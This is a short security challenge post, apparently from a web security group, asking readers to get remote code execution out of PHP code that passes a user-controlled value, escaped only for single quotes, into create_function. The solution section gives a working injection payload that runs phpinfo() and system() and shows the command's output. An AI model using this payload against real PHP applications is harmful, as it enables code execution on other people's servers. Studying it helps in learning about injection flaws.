Hi guys, Sebastian from @internetwache here. I discovered the following PHP sourcecode in a webapplication: *** create_function('','return md5(\''.str_replace("'", "\\'", $arg).'\');'); *** $arg is an user-controlled parameter. Try to make a RCE out of it (no solution guaranteed)! If you have a solution, contact us at @internetwache. Testbed for you: *** cat /tmp/test.php *** Use it like this: *** > php /tmp/test.php "foo" Payload: return md5('foo'); Exec: acbd18db4cc2f85cedef654fccc4a4d8 *** Have fun! ~ Sebastian =========SOLUTION========= First one to solve it was Jakub Żoczek (@zoczus): - Payload: \'.phpinfo());}// - Works on cmd-line and apache - Screenshot: http://i.imgur.com/iis47XM.png *** > php /tmp/test.php "\\'.system(\"date\"));}//" Payload: return md5('\\'.system("date"));}//'); Exec: Mi 8. Okt 14:09:24 CEST 2014 e928add3e8dc71d4768ad85338b90309⏎ *** Well done!